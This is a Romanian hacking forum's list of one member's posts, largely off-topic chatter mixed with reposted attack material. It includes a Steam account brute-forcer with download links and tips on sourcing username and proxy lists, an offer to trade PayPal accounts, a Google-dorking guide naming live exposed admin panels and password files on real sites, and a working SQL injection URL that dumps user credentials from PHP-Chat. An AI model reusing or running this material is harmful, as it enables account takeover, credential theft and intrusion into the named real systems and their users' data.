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Everything posted by ZeroCold

  1. www.rstcenter.xxx ))) Siteurile xxx nu sunt ilegale???
  2. Ce misto ii tipa aia de dupa carte o_O Bun
  3. Dupa ce termini de scris, dai un copy, apoi dai submit, apoi edit, apoi paste si gata scuze pt offtopic....
  4. si asta ) Romaniaaaa!!!! si inca 1 :
  5. Ii bun, pacat ca cripteaza doar RAT's
  6. iti vor baga mana prin fund pana in stomac si il vor scoate. dute la doctor... Daca ... imi lasi mie pcu tau ??? Multumesc anticipat
  7. :D:D )) Nu mai da scan pe virustotal ! ---- Cu ce criptezi???
  8. Pana acu toata lumea posta sqli si xss, acu au trecut pe stealere... Is curios ce urmeaza dupa o_O... ps: care au conturi de paypall/alertpay si le e frica sa le foloseasca (cunosc multi d-astia) sa imi dea mie pm cu ele, dau alte conturi la schimb... (sa nu fie goale ) E o idee proasta sa se dea acces la "Special Area" pe conturi, toata lumea poate face rost de ele...macar daca ati da pe conturi importante . (nu filelist, lockerz, metin..plm) Dati dupa posturile de calitate sau dupa rep.
  9. Mai bine faceti zona VIP, decat "Special Area". Prin "Special Area" nu veti avea nimic de castigat, se va umple forumul de spam.
  10. Steam`O Brute 1.3 final [PUBLIC] by INSIDER Description The program is intended to recover forgotten passwords to steam account. Screen Translated screen (special for English speaking users) Features [+]Supports proxies (http,sock4/5) [+]Multithreading [+]Built account checker [+]Good speed* [+]Automatic good's saving [+]Saving BAD's and unbruted (with choice). Attention This is the PUBLIC version of brutforcer. Free version has a limitation of 3 threads. Before start Enter 2 text files: first - login;pass - list of accounts, second - proxy:port - list of proxies. Then select type of proxy to useand press Start button. For stopping press Stop button or wait for checking end. FAQ Q: Where I can get the usernames ? A: You can think it yourself, you can download english dictionary, or download the base of steam's usernames from internet. Then you must check the base for validity with built checker. Q: How to connect/create/work with the list of usernames ? ?: Use PowerfulGeneratoR Q: Where I can get a list of proxies ? ?: You can find with google, you can scan with special soft, you can buy private proxies. DOWNLOAD: http://www.multiupload.com/C0RTBC48HU http://www.mediafire.com/?yti5z4wxyrw --------- #sursa: aici.
  11. Invitatiile le-ati putea da pe "rep" (butonul de la reputatie....): 1 punct = 5 inv... etc... EDIT: Cel mai bine ar fi: -sa se restrictioneze total accesul guest; -membru, fara nici un post, acces doar la "Bine ai venit"... -dupa 1 post (dupa ce se prezinta) acces la offtopic (read/post) -dupa 5 posturi (read tutoriale/showoff...doar read) -dupa 10 posturi (post & read tutoriale/showoff...si read & download programe..) -dupa 20 posturi [post & read tot forumul, in afara de "Bine ai venit" ("Bine ai venit" doar read. fara reply, pt a evita spamu)] -dupa 50 posturi (post & read tot forumul + "Bine ai venit") -------------------------- Asa ar fi un pic de ordine... Bine ca astea le-am scris la repezeala, dar eo ceva de genu as face..
  12. Jumatate sunt de pe timpu lu' bunicu...Chiar nu mai face nimeni nimic nou???Sunt sute de pack-uri cu acealeasi chestii... ps: am revenit
  13. Asta'i cartea...nu?
  14. Bravo lor! E YouTube - fiveyears's Channel nu http://www.youtube.com/fiveyearsa
  15. Google: A Hacker's Best Friend In the last few years a number of news articles appeared that warned of the fact that hackers (or crackers if you will) make use of the google search engine to gain access to files they shouldn't be allowed to see or have access to. This knowledge is nothing new to some people but personally I have always wondered how exactly a thing like this works. VNUnet’s James Middleton wrote an article in 2001 talking about hackers using a special search string on google to find sensitive banking data: One such posting on a security newsgroup claimed that searching using the string 'Index of / +banques +filetype:xls' eventually turned up sensitive Excel spreadsheets from French banks. The same technique could also be used to find password files" Another article that appeared on wired.com told us how Adrian Lamo, a hacker who made the news often the last couple of years, explained that google could be used to gain access to websites of big corporations. These articles kept on coming up in the online news. U.S. Military and Government websites were vulnerable because admin scripts could be found using google, medical files, personal records, everything suddenly seemed just one google search away. But these articles seemed to show up once every half year and always talked about it as if it was something new. Another thing was, the articles never explained how one would actually go about doing this. Almost never an example of a search string was given. The last time I read one of these articles I decided it was time to find out for myself, whether google actually could do all they say it can. The following is a report of my findings and a description of some techniques and search strings one could use. Theory The theory behind this is actually quite simple. Either you think of certain data you would like to acquire and try and imagine in what files this kind of data could be stored and you search for these files directly. (Search for *.xls files for example) Or you take the more interesting approach and you try to think of a certain software that allows you to perform certain tasks or to access certain things and you search for critical files of this software. An example could be a content management system. You read up on this particular content management system, check out of what files it exists and search for those. A great example is that of the databases mentioned above, where you know the string “view database” is used on pages that shouldn’t be accessible to you and you then search for pages containing that string, or you check the software and notice that the option to view a database is linked on a webpage within this software called “viewdbase.htm” and you search for “viewdbase.htm” The most important thing is to have a clear goal, to know what it is you want to find. Then search for these specific files or trademarks that these files have. Google Search Options Specific file types: *.xls, *.doc, *.pdf *.ps *.ppt *.rtf Google allows you to search for specific file types, so instead of getting html-files as a result (websites) you get Microsoft excel files for example. The search string you would use would be this: Filetype:xls (for excel files) or filetype:doc for word files. But maybe more interesting would be searching for *.db files and *.mdb files. Google by the way doesn’t tell you you can search for *.db and *mdb files. I wonder what other file types one can search for. Things that come to mind are *.cfg files or *.pwd files, *.dat files, stuff like that. Try and think of something that might get you some interesting results. Inurl Another useful search option is the inurl: option which allows one to search for a certain word one would want to be in the url. This gives you the opportunity to search for specific directories/folders, especially in combination with the “index of” option, about which I will talk later on. An example would be: inurl:admin which would give you results of website urls that have the word “admin” in the url. Index of The index of option is another option that isn’t especially thought of by the creators of google, but comes in very handy. If you use the “index of” string you will find directory listings of specific folders on servers. An example could be: ‘index of” admin or index.of.admin which would get you many directory listings of admin folders. (don’t forget to use the quotes in this case since you are looking for the entire “index of” string, not just for “index” and “of”) Site The site option allows you to come up with results that only belong to a certain domain name extension or to a specific site. For example one could search for .com sites or .box.sk sites or .nl sites, but also for results from just one site, but more interesting might be to search for specific military or government websites. An example of a search string would be: Site:mil or site:gov Site:neworder.box.sk “board” Intitle Intitle is another nice option. It allows you to search for html files that have a certain word or words in the title. The format would be intitle:wordhere. You could check out what words appear in the title of some online control panel or content management system and then search google for this word with the intitle option, to find these control panel pages. Link The Link option allows you to check which sites link to a specific site. As described in Hacking Exposed Third Edition, this could be useful: These search engines provide a handy facility that allows you to search for all sites that have links back to the target organization’s domain. This may not seem significant at first but let’s explore the implications. Suppose someone in an organization decides to put up a rogue website at home or on the target network’s site. Combining Search Options The above mentioned search options might or might not be known to you, but even though they can amount to some interesting results, it’s a fact that when you start combining them, that’s when google’s magic starts to show. For example, one could try this search string: inurl:nasa.gov filetype:xls "restricted" or this one: site:mil filetype:xls "password" or maybe site:mil “index of” admin (I’m just producing these from the top of my head, I don’t know whether they’d result in anything interesting, that’s where you come in. You got to find a search string that gets the results you want.) Examples; The Good Stuff Specific file types: *.xls, *.doc, *.pdf *.ps *.ppt *.rtf To start out simple, you can try and search directly for files that you believe might hold interesting information. The obvious choices for me were things like: Password, passwords, pwd, account, accounts, userid, uid, login, logins, secret, secrets, all followed by either *.doc or *.xls or *.db This led me to quite some interesting results, especially with the *.db option but I actually also found some passwords.doc files, containing working passwords. http://www.doc.state.ok.us/Spreadsheets/private%20prison%20survey%20for%20web.xls http://www.bmo.com/investorrelations/current/current/suppnew/private.xls http://www.nescaum.org/Greenhouse/Private/Participant_List.xls http://www.dscr.dla.mil/aviationinvest/attendance_5Apr01.xls http://web.nps.navy.mil/~drdolk/is3301/PART_IS3301.XLS Admin.cfg Admin.cfg is, most of the times, an admin configuration file of some sort. Many different software obviously use names like “config” or “admin” or “setup”, etc. And most of the times these files contain sensitive information and thus, shouldn’t be accessible for people browsing the web. I tried a search for admin.cfg, using the following search string on google: inurl:admin.cfg “index of” This led me to many results of which many were useless. But some paid out. I found for example: http://www.alternetwebdesign.com/cgi-bin/directimi/admin.cfg Which contained a password. This was the admin password for a database located at http://www.alternetwebdesign.com/cgi-bin/directimi/database.cgi?admin.cfg This database contained sensitive client data of this particular company. I then proceeded to e-mail the company and tell them about the flaw. They replied to me in a very friendly manner and told me they appreciated my help and that they would take the necessary steps to solve the problem. Webadmin A short while back, while working on this article, I ran into this website: http://wacker-welt.de/webadmin/ The website explains that “webadmin” is a small piece of software that allows one to remotely edit parts of a website, upload files, etc. The main page for the webadmin control centre is called ‘webeditor.php”. So obviously, my next step was to visit google and use the inurl tag to find webeditor.php pages that I could reach. I used the following search string: inurl:webeditor.php and I found the following results: http://orbyonline.com/php/webeditor.php http://www-user.tu-chemnitz.de/~hkri/Neuer%20Ordner/webeditor.php http://artematrix.org/webeditor/webeditor.php http://www.directinfo.hu/kapu/webeditor.php All these webeditor.php files were reachable by anyone, merely because the owners failed to (correctly) protect these pages by using .htacces. This mistake allows whomever to change the webpages on the server and thus defacing the site, uploading files and thus possible gaining full access to the server. In browsing through these sites I noticed that the file that allows one to upload files is called “file_upload.php”, which I could then search for at google and find more examples. http://www.hvcc.edu/~kantopet/ciss_225/examples/begphp/ch10/file_upload.php A good example: http://www.pelicandecals.com/admin/webeditor.php The script allows you to change files, like in the above examples, including the index.php. In theory one could write or download whatever malicious script one wants, paste this code into an existing file or just upload it and well, the consequences are obvious. there was also a link “Return Administration” and clicking on it took me to: http://www.pelicandecals.com/admin/administration.html Where there were customer addresses, where one could change pricing, etc. Content Management Systems Content Management Systems are software programs that allow a webmaster to edit, alter and control the content of his website. But the same goes for online control panels of websites. The idea is to find out what files are for example the main files of these software programs. “cms.html” could be one or “panel.html” or “control.cfg” You find out what filenames a certain package uses, you then think of a good search string and hope you strike gold. Frontpage Server Extensions HTML Administration Forms “You can remotely administer the FrontPage Server Extensions from any computer connected to the Internet by using the FrontPage Server Extensions HTML Administration Forms, a set of Web pages that allow you to administer the FrontPage Server Extensions remotely. Well, that’s what Microsoft’s manual has to say about it. This means, users with access to these forms are able to perform a number of administrative functions, remotely. And that means, these forms should be well protected from non-authorized people. Now how would one go about finding non-protected forms over the internet? The first thing we do is try to find out what files these scripts consist of. A short visit to the Microsoft website or a peek into the frontpage manual tells us that the main page for these administration forms is a file called “fpadmin.htm”. So that’s what we need to search for. Now to find a correct search string that will get us the results we want. When a default install is performed, the files get installed in a directory called “admin”. Putting to use what we have learned about google search options and the theory behind this technique, a good search string might be: inurl:fpadmin.htm “index of” admin or maybe inurl:admin/fpadmin.htm Well, these were the results I got: http://www.lehigh.edu/~ineduc/degree_programs/tbte/admin/ http://blackadder.eng.monash.edu.au/frontpage/admin/ http://www.lehigh.edu/collegeofeducation/degree_programs/tbte/admin/ http://www.vsl.gifu-u.ac.jp/freeman/frontpage4/admin/ http://www.tech-geeks.org/contrib/loveless/e-smith-fp-2002/frontpage/version5.0/admin/1033/fpadmin.htm http://fp.nsk.fio.ru/admin/1033/fpadmin.htm But the frontpage manual says more: This means that some of these could be active and thus useful to us and some might not. There is of course, only one way to find out and that is to perform one of the possible administrative functions and see if you get results. I for one decided not to go that far, because it would mean breaking the law. But I’m not here to teach ethics, or at least not today. Freesco Router The Freesco router software for Linux as a default, installs a small web browser which allows owners to control the router through the http protocol. In other words, a website automatically gets setup that allows you to control the router. The default password and login for this control panel is “admin” and “admin”. Many people who use freesco don’t know this. You could search for these Freesco router control websites by using a string such as: intitle:”freesco control panel” or “check the connection” which are words that either are in the title of these pages or on the pages itself. That’s what it’s all about; you check out a certain software, find the part you’d want to be able to reach and figure out which search string would get you the good results. Extra Tips Remember English is the most used language online, but it’s not the only one. Try and search for words or strings that are specific to your language or French or German, etc. For example “beheer” is a Dutch word for “administration” or “privat” is German for “private”. • You can check vulnerability scanners’ scan lists for interesting search strings you might want to use or combine with your own strings. Check : http://paris2k.at.box.sk/tools/listings/ for some examples. • Search for files like: “config.inc.php” or “mysql.cfg” that could contain mySQL password and username combinations. Try to think of good search strings using words like PHP, SQL, mySQl, etc. • Try things like: inurl:admin "index of" "database" or inurl:phpmyadmin "index of" or inurl:mysql "index of" site:neworder.box.sk intitle:index.of or intitle:index.of.private( = intitle:"index of private") Conclusion The internet is a network to which hundreds of thousands, if not millions of web servers are connected and in theory, all data can be reached, unless properly protected. Both software designers and end users should pay more attention to default installation security configuration and security policy. In the end, there are always going to be people who make mistakes, use default installs, use poorly secured software or just don’t care or still believe there’s no danger in putting this kind of data online. And in the end there’s also always going to be curious people who love to find that interesting information they have been hoping for. Google can help you considerably, in locating this kind of information and it’s easy and fun. Sidenote have used in this article, “live examples” because “foobar examples” in this case wouldn’t have been very useful. I hope you choose to learn from these examples and not use them to commit malicious acts. Think of a great search string yourself and don’t abuse the ones I have shown to explain the technique a little bit. (Guess I couldn’t stay away from the ethics lesson after all) Afterword To not abandon tradition I would like to take the chance to greet some people. People like JLP, Rattlesnake, Drew, X, Tek, Sean, Marek, Resolution and others… you all know who you are, Thanks for helping me out numerous times with numerous different things. _____________________________________________________- #Sursa: aici.
  16. PHP-Chat 0.1 Alpha SQL Injection ///////////////////////////////////////////////////////////////// // R00TSECURITY.ORG - YOUR SECURITY COMMUNITY // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - // [2009-09-22] PHP-Chat 0.1 Alpha SQL Injection // http://r00tsecurity.org/db/exploits/290 // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - // GENERATED ON: 2009-12-01 | 00:46:38 ///////////////////////////////////////////////////////////////// EXPLOIT INFO PHP-Chat is based purely on PHP/MySQL which means I don\\\'t use any other technology such as Java or Javascript.The Chat will be released as both a stand-alone and a PHP-Nuke version. http://sourceforge.net/projects/php-chat The exploit is located in the file chat_help.php where the $HTTP_GET_VARS[command] is passed directly to mysql without first sanitizing it [] $query = \\\"SELECT * FROM `\\\" . $table_prefix . \\\"chathelp` WHERE `id` = \\\'$HTTP_GET_VARS[command]\\\' LIMIT 1\\\"; $result = mysql_query($query) or die(\\\"$query failed!\\\"); $row = mysql_fetch_row($result); [] EXPLOIT http://www.site.com/php-chat/chat_help.php?command=-1\\\'+UNION+SELECT+1,concat(user_id,username,user_email,user_password),3,4+FROM+nuke_users/* // http://r00tsecurity.org/db/exploits/290
  17. Learn how to become a cracker... The video tutorials that you are going to download are made by a fabulous Lena151, lessons are easy to understand and easy to follow follow this thread and try to practice from what you will see and learn. Lesson 01: 01. Olly + assembler + patching a basic reverseme (Olly = Ollydebugger: the program used to disassemble software): http://www.ziddu.com/download.php?uid=bK%2Bil5Sma7Kh4palY7KWlJeiZa6alp0%3D3 To get Ollydbg (olly debugger) follow this link: http://www.ziddu.com/download.php?uid=bK6enZWqZ66el5mns6yZlJyiZa2Wlpin5 Lesson 02. Keyfiling the reverseme + assembler: http://www.ziddu.com/download.php?uid=Z6uinZWpbLOelOKnZqqhkZSoY6ydlZmm6 Lesson 03. Basic nag removal header problems: http://www.ziddu.com/download.php?uid=Z6uhm52obrCdmJbzaKqZnJGlaaebmJw%3D6 Lesson 04. Basic aesthetic patching: http://www.ziddu.com/download.php?uid=arGimZesZ66elOKnZKqhkZSoYaydnJmm4 Lesson05. Comparing on changes in cond jumps animate overin breakpoints : http://www.ziddu.com/download.php?uid=bauampqmbquiluKnaKqhkZSoZaydmpim8 Lesson 6: The plain stupid patching method searching for tex http://www.ziddu.com/download.php?uid=ba%2Bdl52sabChlJmltqyZlJyiaK2Wlpit8 Lesson07. Intermediate level patching Kanal in PEiD : http://www.ziddu.com/download.php?uid=ZrGenJysbbOfnOKnZaqhkZSoYqydlpas5 _______________ #sursa: aici
  18. How To Change Your IP Address With AOL SOFTWARE 1) Create an AOL Mail from here (Get A Free AOL MAIL): https://new.aol.com/freeaolweb/?promocode=814170 2) Download The Software Aol Desktop 10.1 from here: http://daol.aol.com/software/desktop 3) Install the Aol Desktop . 4) After the installation is complete on your desktop will appear the AOL Desktop Icon (Aol Desktop.exe) Enter to Aol Desktop Browser and the config are the following : a) After everything it's ok you can check you email and after that click SignOut. c) Click Sign IN button again and : d) e) f) After you will get a message that right know you are connected you can enter your browser (mozilla,internet explorer etc) . Check your ip on: http://www.ip2location.com/ and if everything it's ok it will appear like this : ______________________________________
  19. Bine ai venit! o_O
  20. Metode De a-ti ascunde identitatea pe internet Exista multe metode de a ne ascunde adresa, identitatea pe internet (IP) mai jos voi incerca sa explica cateva metode. 1)Proxy Cele mai folosite si mai comune fiind cu ajutorul (web) proxy-urilor. Ca si terminologie, cuvantul “proxy” sau “proxy server” denumeste un calculator sau un program care actioneaza ca intermediar intre un client (de exemplu, browser-ul) si alte server-e. “Web proxy“-urile se refera la site-uri care indeplinesc rolul de proxy-uri, adica de intermediare intre noi si site-urile pe care dorim sa le vizitam.In cazul lui RDS e contorizat orice trafic in afara retelei RDS, deci un proxy apartinand altui provider nu ajuta cu nimic. Cum imi ascunde un web proxy adresa IP? Practic un web proxy NU ascunde adresa IP, ci doar actioneaza ca intermediar intre calculatorul nostru si site-ul pe care dorim sa il vizitam. Astfel, site-ul pe care il vizitam nu va inregistra adresa noastra IP, ci adresa IP a proxy-ului. La ce pot folosi un web proxy? In general, web proxy-urile se folosesc pentru a “ocoli” filtrele de internet care functioneaza in scoli, companii, institutii sau chiar la nivel guvernamental (cum este cazul in China, Iran sau Emiratele Arabe Unite). De exemplu, intr-o scoala in care este blocat site-ul Hi5.com, se poate folosi un astfel proxy pentru a accesa site-ul.Dar se poate folosi si pentru a nu fi identificat pe internet. Unde gasesc web proxy-uri? Exista foarte multe proxy-uri. Din pacate, marea lor majoritate au viata scurta (de ordinul saptamanilor sau lunilor) astfel incat e nevoie sa le schimbam foarte des. Pentru a gasi proxy-uri e suficient sa dam un search pe Google dupa cuvinte ca “web proxy“, proxy ip etc. Cum se foloseste un proxy? Un web proxy este foarte usor de folosit.Va voi da un exemplu in Mozilla Fierfix. http://www.mediafire.com/?vm2d5gdlijo 2)Nologine NOLOGIN inseamna acele "root-uri" care nu te poti loga dar nu iti da access la nici un director ,e xemplu, daca rulati un server de mail ar trebui sa adaugati utilizatori care pot accesa lor de mail, dar nu doriti sa le acceseze hard-disk ar trebui sa le faca Nologin sau false. Ei pot doar citi mail lor ai nu pot salva pe server ar trebui sa le salvati-l pe propriul computer. Un tutorial cum pui un neologin in fierfox: http://www.mediafire.com/?mm2mlmymjjy Sau aici: http://rstcenter.com/forum/24312-tutorial-nologine.rst 3)TOR Bun, dar schimbarea set?rilor proxy nu poate decât s? ascund? activitatea voastr? pentru administratorii resurselor pe care le accesa?i, nu ?i pentru ISP-urile (prestatorii de servicii internet) locale, nici pentru administratorii serverelor proxy folosite sau ale neologinelor. Pentru a ascunde complet identitatea ?i activitatea ta în timpul navig?rii web, o solutie buna este utilizarea tehnologiei TOR (The Onion Router), care pe langa faptul ca ascunde identitatea voastra, mai si incripteaz? (sau encripteaza, codifica) traficul care iese si intr? în computerul tau. O explica?ie despre cum func?ioneaz? aceast? tehnologie, g?si?i aici. Setul de programe necesare downloada?i de aici Instruc?iunile de instalare le g?si?i aici. Trebuie s? adaug c? cel mai recomandat este s? folosi?i Mozilla Firefox, ?i s? mai instala?i Torbutton (e un addon pentru Mozilla) de aici. Dup? asta, porni?i TOR, restarta?i Mozilla Firefox, ?i în col?ul din dreapta jos, ap?sa?i pe “Tor Disabled” ca s? deveni?i anonim (butonul se va transforma în unul verde - Tor Enabled). Utilizarea TOR are ?i avantaje ?i dezavantaje. Unul dintre dezavantaje este viteza de navigare mai redus?, iar unul din avantajele pe care le ve?i observa este c? nu vor mai ap?rea bannere ?i reclame pe site-uri (mul?umit? programei Privoxy care se va instala împreun? cu TOR) . O metod? mai simpl? de a folosi tehnologia TOR, este utilizarea browserului TORPARK (care ?i-a schimbat numele în xerobank anonymous browser), pe care îl pute?i accesând: http://www.xerobank.com/xB_browser.html Acest browser se bazeaz? pe Mozilla Firefox, nu necesit? s? fie instalat, ?i poate lucra direct de pe un USB flash card. Este aproape ideal pentru lucr?torii din organiza?iile ?i institu?iile în care este limitat accesul spre spre anumite resurse web: administratorii nici nu vor afla ce site-uri vizita?i ! Un dezavantaj este c? viteza de navigare este limitat? în varianta gratuit? a Torpark-ului, dar de lucrat se poate… Se pot configura ?i alte programe s? foloseasc? tehnologia TOR. Pe http://wiki.noreply.org/noreply/TheOnionRouter/TorifyHOWTO g?si?i instruc?iunile pentru a TOR-ifia alte programe. _______________________ #sursa: aici. _______________________ Daca mai cunoasteti si alte metode postati aici, in continuare Multumesc!
  21. Altii.... Din 30k gasesti tu 10-15 "baieti isteti" care sa se ocupe de forum
  22. Ei au spus ce vroiam sa spun eu. Unlimited. ---------------------- A face un deface inseamna ca esti un hacker? Nu, 1 deface...neaaa...bulan Dupa 60, 80, devine ceva obisnuit, plictiseala...atunci da... (eu personal nu am dat nici un deface... ) Daca spargi un account yahoo,msn,hi5,facebook sau ma rog esti un hacker? La fel ca la deface 1 cont = cu 0, cateva milioane e altceva... Daca folosesti un tool de tipul trojan sau rat esti un hacker? Daca stii sa il folosesti si prinzi persoane cu anumite cunostiinte cu el e alta chestie....( cum si-a luato tinkode, daca nu era fake ) ), oricum si aici tot de cantitate este vorba, persoana respectiva poate era intro pasa proasta sau cine stie. Atunci cand prinzi mai multe persoane e altceva. Parerea mea !
  23. Eu sunt pe aici de 1 an si ceva, citesc zilnic, aproape toate posturile, de ex ma intereseaza tutorialele, dar nu toate, daca nu sunt bine structurate nu le bag in seama, programe hack daca sunt noi, in ultimele zile numai porcarii, stiri securitate citesc numai chestii mai importante (begood pune chestii misto). Aici gasesc chestii amuzante, interesante...etc, este singurul site/forum care il vizitez zilnic . Cand citesc nu ma duc intr-o categorie anume, ma duc direct la "new post". @ Nytro incearca sa desfiintezi offtopic pt o luna sa vezi ce se intampla. Nu mai lasa vizitatorii sa vada ShowOff, nu stiu daca s-a rezolvat dar eu am avut probleme cu unu...nu mari Daca ati putea reface rst, cum era la inceput, pagina principala, toolurile,chatu'...etc Isr va intrece
  24. Schimba browseru. Mie pe chrome dupa ce cautam imi aparea aia, si imi cerea sa bag o captcha, apoi ma lasa . O protectie de la gugal...cred, pana acu nu am mai vazut-o, incearca alt motor de cautare, bing, cuil, yahuu...etc
  25. Nu e vina lui, are probleme forumul, mi s-a intamplat si mie doar ca eu editam repede dupa.
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